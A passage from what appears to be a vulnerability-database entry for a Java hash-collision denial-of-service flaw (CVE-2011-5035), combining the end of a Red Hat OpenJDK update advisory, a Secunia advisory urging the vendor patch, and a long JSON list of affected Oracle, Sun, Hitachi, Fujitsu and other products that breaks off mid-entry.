x86_64: java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-devel-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-javadoc-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.6.0-openjdk-1.6.0.0-1.43.1.10.6.el6_2.src.rpm
i386: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.i686.rpm
x86_64: java-1.6.0-openjdk-debuginfo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-demo-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm java-1.6.0-openjdk-src-1.6.0.0-1.43.1.10.6.el6_2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2011-3563.html https://www.redhat.com/security/data/cve/CVE-2011-3571.html https://www.redhat.com/security/data/cve/CVE-2011-5035.html https://www.redhat.com/security/data/cve/CVE-2012-0497.html https://www.redhat.com/security/data/cve/CVE-2012-0501.html https://www.redhat.com/security/data/cve/CVE-2012-0502.html https://www.redhat.com/security/data/cve/CVE-2012-0503.html https://www.redhat.com/security/data/cve/CVE-2012-0505.html https://www.redhat.com/security/data/cve/CVE-2012-0506.html https://access.redhat.com/security/updates/classification/#critical http://icedtea.classpath.org/hg/release/icedtea6-1.10/file/icedtea6-1.10.6/NEWS http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFPOwEiXlSAg2UNWIIRAnYKAKCorWMpTAsiiuJ4uSywvmAym2EK0wCfa/8B lhqpUTdPMNmgswBpMj4pV/M= =9liL -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ----------------------------------------------------------------------
Secunia is hiring!
Find your next job here:
http://secunia.com/company/jobs/
TITLE: Oracle Multiple Products Web Form Hash Collision Denial of Service Vulnerability
SECUNIA ADVISORY ID: SA47819
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47819/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47819
RELEASE DATE: 2012-02-01
DISCUSS ADVISORY: http://secunia.com/advisories/47819/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/47819/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=47819
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in multiple Oracle products, which can be exploited by malicious people to cause a DoS (Denial of Service).
The vulnerability is caused due to an error within a hash generation function when hashing form posts and updating a hash table.
The vulnerability is reported in the following products: * Oracle Application Server 10g Release 3 version 10.1.3.5.0. * Oracle iPlanet Web Server 7.0. * Oracle iPlanet Web Server (formerly Oracle Java System Web Server) 6.1.
SOLUTION: Apply patch.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY: http://www.oracle.com/technetwork/topics/security/alert-cve-2011-5035-1506603.html
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "3.0.1"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 2.1,
"vendor": "oracle",
"version": "2.1.1"
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "3.1.1"
},
{
"_id": null,
"model": "communications server",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "2.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "10.3.4"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "9.2.4"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 1.1,
"vendor": "oracle",
"version": "10.0.2"
},
{
"_id": null,
"model": "glassfish server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "3.1.1"
},
{
"_id": null,
"model": "jre 1.6.0 03",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 17",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 30",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 18",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 22",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.6.0 28",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 14",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.6.0 21",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 20",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 25",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 07",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.6.0 18",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 27",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 19",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 03",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 17",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.7.0 2",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 10",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.7.0 2",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 14",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 04",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 04",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.6.0 25",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 27",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 15",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 30",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 12",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.7"
},
{
"_id": null,
"model": "jre 1.6.0 02",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 23",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 01",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 06",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 19",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 15",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 07",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 28",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 23",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 11",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 13",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.6.0 02",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 05",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 1.6.0 26",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 26",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 21",
"scope": null,
"trust": 0.9,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 24",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jre 06",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 11",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk 10",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jdk",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7"
},
{
"_id": null,
"model": "jdk 1.6.0 22",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 24",
"scope": null,
"trust": 0.9,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jdk 13",
"scope": "eq",
"trust": 0.9,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apache tomcat",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ruby",
"version": null
},
{
"_id": null,
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "the php group",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6.8"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.7.3"
},
{
"_id": null,
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6.8"
},
{
"_id": null,
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.7.3"
},
{
"_id": null,
"model": "java system web server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "application server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "10g r3 (10.1.3.5.0)"
},
{
"_id": null,
"model": "iplanet web server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "jrockit",
"scope": "lte",
"trust": 0.8,
"vendor": "oracle",
"version": "27.7.1"
},
{
"_id": null,
"model": "jrockit",
"scope": "lte",
"trust": 0.8,
"vendor": "oracle",
"version": "28.2.2"
},
{
"_id": null,
"model": "sun java system application server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "8.1"
},
{
"_id": null,
"model": "sun java system application server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "8.2"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "11gr1 (10.3.3"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "10.3.5)"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.8,
"vendor": "oracle",
"version": "12cr1 (12.1.1)"
},
{
"_id": null,
"model": "hp xp p9000 performance advisor software",
"scope": "lte",
"trust": 0.8,
"vendor": "hewlett packard",
"version": "5.4.1"
},
{
"_id": null,
"model": "cosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "enterprise version 6"
},
{
"_id": null,
"model": "cosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "standard version 6"
},
{
"_id": null,
"model": "cosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "version 5"
},
{
"_id": null,
"model": "cosminexus client",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "version 6"
},
{
"_id": null,
"model": "cosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "light version 6"
},
{
"_id": null,
"model": "cosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "professional version 6"
},
{
"_id": null,
"model": "cosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "standard version 6"
},
{
"_id": null,
"model": "cosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "version 5"
},
{
"_id": null,
"model": "cosminexus developer\u0027s kit for java",
"scope": null,
"trust": 0.8,
"vendor": "hitachi",
"version": null
},
{
"_id": null,
"model": "cosminexus primary server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "base"
},
{
"_id": null,
"model": "cosminexus server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "- standard edition version 4"
},
{
"_id": null,
"model": "cosminexus server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "- web edition version 4"
},
{
"_id": null,
"model": "cosminexus studio",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "- standard edition version 4"
},
{
"_id": null,
"model": "cosminexus studio",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "- web edition version 4"
},
{
"_id": null,
"model": "cosminexus studio",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "version 5"
},
{
"_id": null,
"model": "hirdb for java /xml",
"scope": null,
"trust": 0.8,
"vendor": "hitachi",
"version": null
},
{
"_id": null,
"model": "developer\u0027s kit for java",
"scope": null,
"trust": 0.8,
"vendor": "hitachi",
"version": null
},
{
"_id": null,
"model": "processing kit for xml",
"scope": null,
"trust": 0.8,
"vendor": "hitachi",
"version": null
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "enterprise"
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "express"
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "light"
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "smart edition"
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "standard"
},
{
"_id": null,
"model": "ucosminexus application server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "standard-r"
},
{
"_id": null,
"model": "ucosminexus client",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "none"
},
{
"_id": null,
"model": "ucosminexus client",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "for plug-in"
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "01"
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "light"
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "professional"
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "professional for plug-in"
},
{
"_id": null,
"model": "ucosminexus developer",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "standard"
},
{
"_id": null,
"model": "ucosminexus operator",
"scope": null,
"trust": 0.8,
"vendor": "hitachi",
"version": null
},
{
"_id": null,
"model": "ucosminexus portal framework",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "entry set"
},
{
"_id": null,
"model": "ucosminexus primary server",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "base"
},
{
"_id": null,
"model": "ucosminexus service",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "architect"
},
{
"_id": null,
"model": "ucosminexus service",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "platform"
},
{
"_id": null,
"model": "ucosminexus service",
"scope": "eq",
"trust": 0.8,
"vendor": "hitachi",
"version": "platform - messaging"
},
{
"_id": null,
"model": "internet navigware server",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage application development cycle manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage application framework suite",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage application server",
"scope": "eq",
"trust": 0.8,
"vendor": "fujitsu",
"version": "none"
},
{
"_id": null,
"model": "interstage application server",
"scope": "eq",
"trust": 0.8,
"vendor": "fujitsu",
"version": "plus developer / apworks / studio"
},
{
"_id": null,
"model": "interstage business application server",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage form coordinator workflow",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage job workload server",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage list manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage list works",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage service integrator",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage shunsaku data manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage web server",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "interstage xml business activity recorder",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "serverview",
"scope": "eq",
"trust": 0.8,
"vendor": "fujitsu",
"version": "resource orchestrator cloud edition"
},
{
"_id": null,
"model": "success server",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker availability view",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker desktop inspection",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker it change manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker it process master",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker operation manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker runbook automation",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker service catalog manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker service quality coordinator",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "systemwalker software configuration manager",
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"_id": null,
"model": "jdk 01-b06",
"scope": "eq",
"trust": 0.6,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "jre 1.6.0 2",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jdk 1.6.0 01",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "jre 1.6.0 20",
"scope": null,
"trust": 0.6,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.5.0"
},
{
"_id": null,
"model": "jrockit r28.2.2",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "java se sr8 fp1",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6"
},
{
"_id": null,
"model": "java system web server sp9",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "linux enterprise sdk sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "jrockit r27.6.0-50",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.5.015"
},
{
"_id": null,
"model": "processing kit for xml",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "nonstop server h06.16.01",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.19.00",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "enterprise linux as extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "4"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "11.10"
},
{
"_id": null,
"model": "jdk 01",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6"
},
{
"_id": null,
"model": "cosminexus studio web edition",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-0"
},
{
"_id": null,
"model": "nonstop server j06.08.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.15.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "meeting exchange sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1"
},
{
"_id": null,
"model": "jdk update",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.6.06"
},
{
"_id": null,
"model": "java se",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "java se",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "cosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "java ibm 64-bit sdk for z/os",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "nonstop server j06.06.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "jdk and jre",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.0"
},
{
"_id": null,
"model": "aura session manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "1.1"
},
{
"_id": null,
"model": "java system web server sp7",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "nonstop server j06.14",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "jrockit r27.6.2",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "jrockit r27.6.5",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "ucosminexus application server standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "aura system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1.3"
},
{
"_id": null,
"model": "aura system platform",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "messaging storage server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2.8"
},
{
"_id": null,
"model": "nonstop server j06.09.03",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "nonstop server h06.26",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "glassfish server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.0"
},
{
"_id": null,
"model": "nonstop server j06.04.02",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura system platform sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.10"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7.2"
},
{
"_id": null,
"model": "nonstop server j06.13",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "aura session manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "linux enterprise server sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "ip office application server",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.1"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
